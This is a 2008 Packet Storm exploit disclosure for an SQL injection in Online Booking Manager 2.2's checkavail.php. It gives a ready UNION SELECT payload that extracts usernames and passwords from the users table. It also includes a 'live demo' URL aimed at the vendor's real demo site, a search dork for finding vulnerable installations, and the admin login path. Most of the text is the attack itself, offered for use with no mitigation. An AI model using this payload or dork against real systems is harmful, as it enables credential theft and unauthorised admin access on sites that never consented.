obm-sql.txt

2008-06-29T00:00:00
ID PACKETSTORM:67776
Type packetstorm
Reporter Hussin X
Modified 2008-06-29T00:00:00

Description

                                        
                                            `#########################################################  
#  
# Online Booking Manager2.2 (id=) SQL Injection Vulnerability  
#  
#########################################################  
#  
# Author: Hussin X  
#  
# Home : www.tryag.cc/cc  
#   
# email: darkangel_g85[at]Yahoo[DoT]com  
# hussin.x[at]hotmail[DoT]com  
#  
# IRAQI  
#  
##########################################################  
# HomE script : http://www.onlinebookingmanager.com  
#   
# demo : http://demo.onlinebookingmanager.com/guestside/  
#   
##########################################################  
#  
# DorK : Online Booking Manager2.2  
#  
##########################################################  
  
Exploit:   
  
  
http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--  
  
  
  
  
L!VE DEMO:  
  
  
http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--  
  
  
  
  
Login AdmiN :  
  
  
  
/adminside/systemadmin/  
  
  
####################################( Greetz )##################################  
# #  
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #   
# Silic0n/ FAHD / Iraqihack #   
# #  
#################################(and All IRAQIs)###############################  
  
`